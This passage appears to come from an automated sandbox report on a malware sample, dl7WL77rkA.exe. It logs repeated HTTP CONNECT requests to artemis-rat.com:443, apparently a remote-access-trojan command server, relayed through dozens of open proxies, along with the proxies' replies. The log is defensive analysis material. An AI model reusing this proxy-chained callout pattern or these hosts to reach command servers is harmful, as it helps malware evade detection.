                                                                                                                                                                                                                                                            Content-Length: 635
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.435575962 CET172IN
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.4.4</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1089192.168.2.55283547.74.226.850013876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.120196104 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1090192.168.2.55282927.65.240.15710803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.122005939 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1091192.168.2.55285945.233.2.141533876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.124289036 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1092192.168.2.55283443.255.113.23280803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.124826908 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1093192.168.2.55290174.119.144.6041453876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.128709078 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1094192.168.2.552910162.223.94.166803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.134587049 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.523245096 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:42 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1095192.168.2.55285445.11.95.16560383876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.134588957 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.582854986 CET39INHTTP/1.0 200 Connection established


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1096192.168.2.552853112.78.181.21080803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.138060093 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.905004978 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.092669010 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.202636957 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:50.405278921 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                                                                                                                                                                                                                            1097192.168.2.552936146.19.106.193123343876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp  Bytes transferred  Direction  Data
Mar 11, 2024 03:30:42.140250921 CET  223  OUT  CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                                                                                                                                                                                                                            1098192.168.2.55293945.196.150.15554323876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp  Bytes transferred  Direction  Data
Mar 11, 2024 03:30:42.156244993 CET  223  OUT  CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:42.379040956 CET  308  IN  HTTP/1.1 407 Proxy Authentication Required
                                                                                                                                                                                                                                                            Server: FaaS v1.3-20220203-7fa38bd5af
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:42 GMT
                                                                                                                                                                                                                                                            Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                            Content-Length: 65
                                                                                                                                                                                                                                                            Proxy-Authenticate: Basic realm="Proxy"
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Ascii: HTTP authorization error: ip auth failed, no credentials provided


Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                                                                                                                                                                                                                            1099192.168.2.55296947.89.184.1831283876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp  Bytes transferred  Direction  Data
Mar 11, 2024 03:30:42.194062948 CET  223  OUT  CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:42.411362886 CET  38  IN  HTTP/1.1 200 OK
                                                                                                                                                                                                                                                            content-length: 0


Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                                                                                                                                                                                                                            1100192.168.2.552334220.194.189.14431283876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp  Bytes transferred  Direction  Data
Mar 11, 2024 03:30:42.196629047 CET  223  OUT  CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:31:12.693600893 CET  719  IN  HTTP/1.1 502 Bad Gateway
                                                                                                                                                                                                                                                            Server: ZZY_WEB/20.08.18
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:53:45 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 563
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>502 Bad Gateway</title></head><body><center><h1>502 Bad Gateway</h1></center><hr><center>ZZY_WEB/20.08.18</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
Mar 11, 2024 03:31:15.174531937 CET  719  IN  HTTP/1.1 502 Bad Gateway
                                                                                                                                                                                                                                                            Server: ZZY_WEB/20.08.18
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:53:45 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 563
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>502 Bad Gateway</title></head><body><center><h1>502 Bad Gateway</h1></center><hr><center>ZZY_WEB/20.08.18</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
Mar 11, 2024 03:31:18.153526068 CET  719  IN  HTTP/1.1 502 Bad Gateway
                                                                                                                                                                                                                                                            Server: ZZY_WEB/20.08.18
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:53:45 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 563
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>502 Bad Gateway</title></head><body><center><h1>502 Bad Gateway</h1></center><hr><center>ZZY_WEB/20.08.18</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
Mar 11, 2024 03:31:24.105346918 CET  719  IN  HTTP/1.1 502 Bad Gateway
                                                                                                                                                                                                                                                            Server: ZZY_WEB/20.08.18
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:53:45 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 563
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>502 Bad Gateway</title></head><body><center><h1>502 Bad Gateway</h1></center><hr><center>ZZY_WEB/20.08.18</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                                                                                                                                                                                                                            1101192.168.2.552911103.113.71.23031283876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp  Bytes transferred  Direction  Data
Mar 11, 2024 03:30:42.198205948 CET  223  OUT  CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.967607021 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.939420938 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.796786070 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:49.405452967 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:53.014482975 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:56.679776907 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:03.904896975 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1102 | 192.168.2.5 | 52970 | 118.27.33.17 | 8118 | 3876 | C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:42.206578970 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:43.245512962 CET | 132 | IN | HTTP/1.1 503 Too many open connections
Content-Type: text/plain
Connection: close
Data Raw: 4d 61 78 69 6d 75 6d 20 6e 75 6d 62 65 72 20 6f 66 20 6f 70 65 6e 20 63 6f 6e 6e 65 63 74 69 6f 6e 73 20 72 65 61 63 68 65 64 2e 0d 0a
Data Ascii: Maximum number of open connections reached.


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1103 | 192.168.2.5 | 52389 | 138.2.73.157 | 1080 | 3876 | C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:42.219557047 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1104 | 192.168.2.5 | 52890 | 148.72.215.230 | 48640 | 3876 | C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:42.219841003 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:43.092361927 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:44.201915979 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:46.405236959 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:50.592715025 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:54.702217102 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:58.905081034 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1105 | 192.168.2.5 | 51072 | 167.86.69.142 | 42214 | 3876 | C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:42.229280949 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:45.389478922 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:48.405390024 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:54.499097109 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1106 | 192.168.2.5 | 53014 | 104.19.235.10 | 80 | 3876 | C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:42.236457109 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:42.391025066 CET | 316 | IN | HTTP/1.1 400 Bad Request
Server: cloudflare
Date: Mon, 11 Mar 2024 02:30:42 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1107192.168.2.552922210.72.11.4631283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.246313095 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.624404907 CET39INHTTP/1.1 200 Connection established


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1108192.168.2.552980146.19.106.217123343876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.253923893 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1109192.168.2.552913139.99.148.9031283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.254494905 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.610845089 CET536INHTTP/1.1 407 Proxy Authentication Required
                                                                                                                                                                                                                                                            Server: squid/3.5.20
                                                                                                                                                                                                                                                            Mime-Version: 1.0
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:42 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html;charset=utf-8
                                                                                                                                                                                                                                                            Content-Length: 3711
                                                                                                                                                                                                                                                            X-Squid-Error: ERR_CACHE_ACCESS_DENIED 0
                                                                                                                                                                                                                                                            Vary: Accept-Language
                                                                                                                                                                                                                                                            Content-Language: en
                                                                                                                                                                                                                                                            Proxy-Authenticate: Basic realm="Squid Basic Authentication"
                                                                                                                                                                                                                                                            X-Cache: MISS from ns547184.ip-139-99-148.net
                                                                                                                                                                                                                                                            X-Cache-Lookup: NONE from ns547184.ip-139-99-148.net:3128
                                                                                                                                                                                                                                                            Via: 1.1 ns547184.ip-139-99-148.net (squid/3.5.20)
                                                                                                                                                                                                                                                            Connection: close
